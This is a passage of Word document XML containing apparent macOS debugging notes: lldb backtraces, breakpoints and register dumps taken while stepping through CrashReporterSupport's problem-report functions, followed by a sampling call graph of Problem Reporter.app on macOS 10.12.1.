    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #1: 0x00007fffd1d8c622 libsystem_pthread.dylib`_pthread_wqthread + 1023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #2: 0x00007fffd1d8c211 libsystem_pthread.dylib`start_wqthread + 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE"/>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">  thread #5: tid = 0x3b9ff3, 0x00007fffd1ca44e6 libsystem_kernel.dylib`__workq_kernreturn + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #0: 0x00007fffd1ca44e6 libsystem_kernel.dylib`__workq_kernreturn + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #1: 0x00007fffd1d8c7b5 libsystem_pthread.dylib`_pthread_wqthread + 1426</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #2: 0x00007fffd1d8c211 libsystem_pthread.dylib`start_wqthread + 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE"/>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">  thread #6: tid = 0x3b9ff4, 0x00007fffd1ca44e6 libsystem_kernel.dylib`__workq_kernreturn + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #0: 0x00007fffd1ca44e6 libsystem_kernel.dylib`__workq_kernreturn + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #1: 0x00007fffd1d8c7b5 libsystem_pthread.dylib`_pthread_wqthread + 1426</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #2: 0x00007fffd1d8c211 libsystem_pthread.dylib`start_wqthread + 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE"/>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">  thread #7: tid = 0x3b9ff5, 0x00007fffd1ca3cba libsystem_kernel.dylib`__psynch_mutexwait + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #0: 0x00007fffd1ca3cba libsystem_kernel.dylib`__psynch_mutexwait + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #1: 0x00007fffd1d8cf6a libsystem_pthread.dylib`_pthread_mutex_lock_wait + 100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    frame #2: 0x00007fffc838a2de CoreSymbolication`CSCppExceptionSafeThread::sacrificial_thread_init() + 98</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #3: 0x00007fffc838a278 CoreSymbolication`thread_init_trampoline(CSCppExceptionSafeThread*) + 9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #4: 0x00007fffd1d8caab libsystem_pthread.dylib`_pthread_body + 180</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #5: 0x00007fffd1d8c9f7 libsystem_pthread.dylib`_pthread_start + 286</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #6: 0x00007fffd1d8c221 libsystem_pthread.dylib`thread_start + 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>(lldb) break set -n CROpenProblemReport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>Breakpoint 1: where = CrashReporterSupport`CROpenProblemReport, address = 0x00007fffc86aa2ea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>(lldb) break set -n CRSaveProblemReport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>Breakpoint 2: where = CrashReporterSupport`CRSaveProblemReport, address = 0x00007fffc86aa401</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>(lldb) c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>Process 25625 resuming</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>Process 25625 stopped</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>* thread #2: tid = 0x3b9ff0, 0x00007fffc86aa401 CrashReporterSupport`CRSaveProblemReport, stop reason = breakpoint 2.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #0: 0x00007fffc86aa401 CrashReporterSupport`CRSaveProblemReport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>CrashReporterSupport`CRSaveProblemReport:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>-&gt;  0x7fffc86aa401 &lt;+0&gt;: pushq  %rbp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc86aa402 &lt;+1&gt;: movq   %rsp, %rbp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc86aa405 &lt;+4&gt;: pushq  %r15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc86aa407 &lt;+6&gt;: pushq  %r14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>(lldb) bt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>* thread #2: tid = 0x3b9ff0, 0x00007fffc86aa401 CrashReporterSupport`CRSaveProblemReport, stop reason = breakpoint 2.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  * frame #0: 0x00007fffc86aa401 CrashReporterSupport`CRSaveProblemReport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #1: 0x0000000108e610ee ReportCrash`___lldb_unnamed_function246$$ReportCrash + 1074</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #2: 0x0000000108e61cf6 ReportCrash`___lldb_unnamed_function251$$ReportCrash + 154</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #3: 0x00007fffd1d8caab libsystem_pthread.dylib`_pthread_body + 180</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #4: 0x00007fffd1d8c9f7 libsystem_pthread.dylib`_pthread_start + 286</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #5: 0x00007fffd1d8c221 libsystem_pthread.dylib`thread_start + 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>(lldb) reg read</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>General Purpose Registers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       rax = 0x0000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       rbx = 0x00007ffdd97b9fc0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       rcx = 0x0000000000000003</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       rdx = 0x0000000000000009</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       rdi = 0x00007ffdd97b9fc0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       rsi = 0x0000700004ad9e08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       rbp = 0x0000700004ad9ec0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       rsp = 0x0000700004ad9d78</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">        r8 = 0x000000000000000f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">        r9 = 0x00007fffc86b21b6  ""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       r10 = 0x000000010e3cd100  dyld`vtable for ImageLoaderMachOCompressed + 16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       r11 = 0x00007fffc86aa401  CrashReporterSupport`CRSaveProblemReport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       r12 = 0x00007ffdd9802800</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       r13 = 0x0000000000006416</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       r14 = 0x00007fffd1288b40  libobjc.A.dylib`objc_msgSend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">       r15 = 0x00007fffd1288b40  libobjc.A.dylib`objc_msgSend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       rip = 0x00007fffc86aa401  CrashReporterSupport`CRSaveProblemReport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    rflags = 0x0000000000000206</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">        cs = 0x000000000000002b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">        fs = 0x0000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">        gs = 0x0000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE"/>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>(lldb) c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>Process 25625 resuming</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>Process 25625 stopped</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>* thread #2: tid = 0x3b9ff0, 0x00007fffc86aa2ea CrashReporterSupport`CROpenProblemReport, stop reason = breakpoint 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #0: 0x00007fffc86aa2ea CrashReporterSupport`CROpenProblemReport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>CrashReporterSupport`CROpenProblemReport:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>-&gt;  0x7fffc86aa2ea &lt;+0&gt;: pushq  %rbp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc86aa2eb &lt;+1&gt;: movq   %rsp, %rbp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc86aa2ee &lt;+4&gt;: pushq  %r15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc86aa2f0 &lt;+6&gt;: pushq  %r14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>(lldb) bt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>* thread #2: tid = 0x3b9ff0, 0x00007fffc86aa2ea CrashReporterSupport`CROpenProblemReport, stop reason = breakpoint 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">  * frame #0: 0x00007fffc86aa2ea CrashReporterSupport`CROpenProblemReport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #1: 0x0000000108e60557 ReportCrash`___lldb_unnamed_function234$$ReportCrash + 283</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #2: 0x0000000108e6141b ReportCrash`___lldb_unnamed_function246$$ReportCrash + 1887</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #3: 0x0000000108e61cf6 ReportCrash`___lldb_unnamed_function251$$ReportCrash + 154</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    frame #4: 0x00007fffd1d8caab libsystem_pthread.dylib`_pthread_body + 180</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #5: 0x00007fffd1d8c9f7 libsystem_pthread.dylib`_pthread_start + 286</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #6: 0x00007fffd1d8c221 libsystem_pthread.dylib`thread_start + 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B913BA" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>(lldb)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B913BA" w:rsidRDefault="00B913BA" w:rsidP="002151C5"/>
    <w:p w:rsidR="00B913BA" w:rsidRDefault="00B913BA" w:rsidP="00B913BA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">21.1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00236B14">
        <w:t>CrashReporterSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B913BA" w:rsidRDefault="00B913BA" w:rsidP="00B913BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>/System/Library/PrivateFrameworks/CrashReporterSupport.framework/Versions/A/</w:t>
      </w:r>
      <w:r w:rsidRPr="00236B14">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CrashReporterSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00707708" w:rsidRDefault="00707708" w:rsidP="002151C5"/>
    <w:p w:rsidR="00707708" w:rsidRDefault="00B913BA" w:rsidP="00B913BA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Problem Repoter.app</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Sampling process 24910 for 3 seconds with 1 millisecond of run time between samples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Sampling completed, processing symbols...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Analysis of sampling Problem Reporter (pid 24910) every 1 millisecond</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Process:         Problem Reporter [24910]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Path:            /System/Library/CoreServices/Problem Reporter.app/Contents/MacOS/Problem Reporter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Load Address:    0x100bc3000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Identifier:      com.apple.ProblemReporter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Version:         10.12 (816)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Build Info:      CrashCatcher-816000000000000~242</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Code Type:       X86-64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Parent Process:  ??? [1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4"/>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Date/Time:       2016-12-05 18:34:31.868 +0800</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Launch Time:     2016-12-05 18:33:52.541 +0800</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>OS Version:      Mac OS X 10.12.1 (16B2555)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Report Version:  7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Analysis Tool:   /usr/bin/sample</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4"/>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Call graph:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    2670 Thread_3795834   DispatchQueue_1: com.apple.main-thread  (serial)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    + 2670 start  (in libdyld.dylib) + 1  [0x7fffd1b75255]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +   2670 NSApplicationMain  (in AppKit) + 1237  [0x7fffba6f11ad]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +     2670 -[NSApplication run]  (in AppKit) + 926  [0x7fffba72653d]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +       2670 -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:]  (in AppKit) + 1637  [0x7fffbae471c3]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +         2670 _DPSNextEvent  (in AppKit) + 1093  [0x7fffba731b79]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +           2670 _BlockUntilNextEventMatchingListInModeWithFilter  (in HIToolbox) + 71  [0x7fffbc047c26]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +             2670 ReceiveNextEventCommon  (in HIToolbox) + 432  [0x7fffbc047df1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +               2670 RunCurrentEventLoopInMode  (in HIToolbox) + 240  [0x7fffbc047fbc]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +                 2670 CFRunLoopRunSpecific  (in CoreFoundation) + 420  [0x7fffbcaaa514]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +                   2670 __CFRunLoopRun  (in CoreFoundation) + 1361  [0x7fffbcaaacc1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +                     2670 __CFRunLoopServiceMachPort  (in CoreFoundation) + 212  [0x7fffbcaab834]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    +                       2670 mach_msg  (in libsystem_kernel.dylib) + 55  [0x7fffd1c9b867]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    +                         2670 mach_msg_trap  (in libsystem_kernel.dylib) + 10  [0x7fffd1c9c41a]</w:t>
      </w:r>
    </w:p>
